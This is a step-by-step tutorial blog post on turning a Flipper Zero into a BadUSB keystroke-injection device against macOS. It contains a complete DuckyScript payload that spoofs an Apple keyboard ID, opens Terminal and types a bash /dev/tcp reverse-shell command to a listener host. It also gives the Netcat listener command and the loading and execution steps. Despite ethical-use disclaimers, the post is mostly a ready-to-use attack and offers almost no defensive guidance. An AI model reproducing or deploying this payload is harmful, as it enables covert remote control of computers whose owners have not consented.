Using a Flipper Zero, a short 12-line DuckyScript text file, and a remote listener on my Ubuntu server I was able to gain a shell on my fully patched, up-to-date Ventura macOS computer.\n\n\\\nIn my lab environment, I use Flipper Zero as a pentesting device to test vulnerabilities in my servers and desktop systems.\n\n\\\nThe Flipper Zero is our preferred ethical hacking tool because it offers an endless number of available payloads, has an on-screen menu selection tool, and uses a progress display to provide feedback.\n\n\\\n> This article is an example of how to use the Flipper Zero as an Ethical Pentesting BadUSB device and how to avoid becoming a victim of such an exploit. Do not use this on computers that you do not own or have permission to use. This code does not make an effort to hide from Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS), Network Detection Systems, Firewalls, or Anti-Virus (AV) software.\n\n## BadUSB Payloads\n\nThe Flipper Zero BadUSB as well as several other BadUSB devices use payloads written in DuckyScript. A simple scripting language for performing keystrokes resulting in a keyboard injection attack.\n\n\\\nA good starting reference point for Duckyscript Payloads is the Official Hak5 website:\n\n__<https://shop.hak5.org/blogs/payloads/tagged/usb-rubber-ducky>__. Here you will find examples and documentation for using DuckScript.\n\n## Let’s Write Some DuckyScript\n\nYou can use a ready-made script, or you can learn to write your own. We’ll show you how to exploit a reverse shell on a macOS computer in a simple step-by-step walkthrough.\n\n\\\nUse your favorite text editor and enter the following text. The macOS has the TextEdit application installed by default, so we’ll use that.\n\n\\\n`ID 05ac:021e Apple:Keyboard `\n\n`DELAY 1000 `\n\n`GUI SPACE `\n\n`DELAY 200 `\n\n`STRING terminal `\n\n`DELAY 200 `\n\n`ENTER `\n\n`DELAY 1000 `\n\n`STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1 `\n\n`DELAY 1000 `\n\n`ENTER `\n\n`DELAY 1000`\n\n\\\nFor this walkthrough we don’t need to know a lot about DuckyScript, so we’ll go over the few commands that our script uses. There are really only six different commands that we use.\n\n| Command | Description |\n|----|----|\n| ID 05ac:021e Apple:Keyboard | This line tells the macOS our Flipper Zero is really an Apple Keyboard. If you do not use this line, the macOS displays the Keyboard Setup Assistant dialog which will cause your script to fail. |\n| DELAY | This command instructs the operating system to wait for a period of time. If we don’t use these delays, the script will run too fast and fail. |\n| GUI SPACE | Presses the Apple Command key and the Space bar to open the ‘Spotlight Search’ window. |\n| STRING Terminal | Enters the string ‘Terminal’ into the Spotlight Search window |\n| ENTER | Presses the ENTER or Return key on your keyboard. After pressing the ENTER key, the macOS launches the Terminal window (/Applications/Utilities/Terminal) |\n| STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1 | This command enters the text into the terminal window which establishes a connection to the Netcat server listening at 10.10.10.157 on Port 4444 |\n\n\\\nChange the IP address at **10.10.10.157** and Port **4444** to your server’s IP address and port.\n\n\\\nSave this file to your disk as **rev_shell_macos.txt**. There is no subdirectory organization under the **badusb** directory on the Flipper Zero so if you are using multiple payloads for different operating systems, use a naming convention that means something to you so you know what it does.\n\n## Installing the qflipper Application\n\nIf you haven’t installed the qflipper application yet, go to the Official Flipper Zero update page and select the installer for your operating system. The page is the firmware update page, but at the bottom are links to install the qflipper application.\n\n\\\n<https://flipperzero.one/update>\n\n[https://flipperzero.one/update?embedable=true](https://flipperzero.one/update?embedable=true)\n\nFollow the instructions for your operating system to install the qflipper application.\n\n\\\n## Getting the Duckyscript Onto the Flipper Zero\n\nOpen the qflipper application and select the folder icon highlighted in red.\n\n\\\n !(https://cdn.hackernoon.com/images/-b3a3tme.png)\n\nSelect and double-click the **SD Card** icon to view the contents.\n\n\\\n !(https://cdn.hackernoon.com/images/-ejc3tdn.png)\n\n\\\nLocate and drag the **rev_shell_macos.txt** file we created earlier onto the **badusb** folder.\n\n\\\n !(https://cdn.hackernoon.com/images/-en93tei.png)\n\n\\\nRemove the Flipper Zero from your computer when the file is done copying.\n\n## Waiting for a Reverse Shell\n\nThe Flipper Zero BadUSB is armed and ready to use. But first, we need to set up our remote listener on our server. On our Ubuntu server, start the Netcat listener with the following command:\n\n\\\n`$ nc -nlvp 4444`\n\n\\\nThe breakdown of the command is listed in the following table. Again you don’t really need to know what’s going on using this command, other than it’s waiting for an incoming connection.\n\n| Command | Description |\n|----|----|\n| **nc** | Netcat command |\n| **-nlvp** | (**n**) no DNS resolution, (**l**) listen for incoming connection, (**v**) verbose output, (**p**) port |\n| **4444** | Port number to listen on |\n\n\\\n\\\n !(https://cdn.hackernoon.com/images/-r0a3tsx.png)\n\nNow that our Netcat listener is ready and waiting for an incoming connection, we can proceed with the Flipper Zero BadUSB attack.\n\n## Starting the BadUSB Reverse Shell\n\nThe hard part is done. The Flipper Zero BadUSB **reverse_shell_macos.txt** file is written, moved to the Flipper Zero, and the Netcat listener is waiting for a connection.\n\n\\\nLocate the Bad USB menu and select the Run button. Do not connect your Flipper Zero to your computer just yet. The Flipper Zero will let you know when it’s time to connect your device.\n\n\\\n !(https://cdn.hackernoon.com/images/1yeuFftUzKRT5YTxuVLPKYa7Uep2-4la3tbw.png)\n\nNavigate to the DuckyScript file we copied in the previous step. If you don’t see this file then you copied it to the wrong directory or did not use the .txt filename extension. Select **rev_shell_macos** and click the Run button.\n\n\\\n !(https://cdn.hackernoon.com/images/1yeuFftUzKRT5YTxuVLPKYa7Uep2-h3b3tcy.png)\n\nWhen you see the **Connect to USB** alert, you can connect your Flipper Zero to your iMac or MacBook’s USB port. Click the Run button.\n\n\\\n !(https://cdn.hackernoon.com/images/1yeuFftUzKRT5YTxuVLPKYa7Uep2-cgc3trn.png)\n\nYou can watch the progress of your BadUSB script in the main window. Once the status reaches 100% the payload is complete and you can remove the Flipper Zero.\n\n\\\n !(https://cdn.hackernoon.com/images/1yeuFftUzKRT5YTxuVLPKYa7Uep2-24d3tsc.png)\n\nIf you are watching the iMac’s computer’s monitor you can see the exploit as it executes the DuckyScript. The Netcat listener on our Ubuntu server displays the results of the successful request.\n\n## Control of your Computer\n\nYou now have control of the macOS computer through a reverse shell. Running on a version of BSD Linux, you can use Unix command line tools and a BASH shell as if you were sitting at the physical iMac’s keyboard.\n\n\\\n !(https://cdn.hackernoon.com/images/-2fc3tpp.png)\n\nYou can use regular Linux commands like **whoami**, **pwd**, **ls**, or **cd** to navigate the filesystem and manipulate the operating system.\n\n\\\n !(https://cdn.hackernoon.com/images/-cdg3tid.png)\n\n## Next Steps\n\nNow that you have an understanding of how the Flipper Zero operates as a BadUSB device you can create your own scripts. Use the Hak5 site or one of the many DuckyScript GitHub repositories available through a Google search as a starting point for your own Duckyscript files.\n\n\\\nOperate legally and ethically. Use this tool on devices that you own or have permission to use.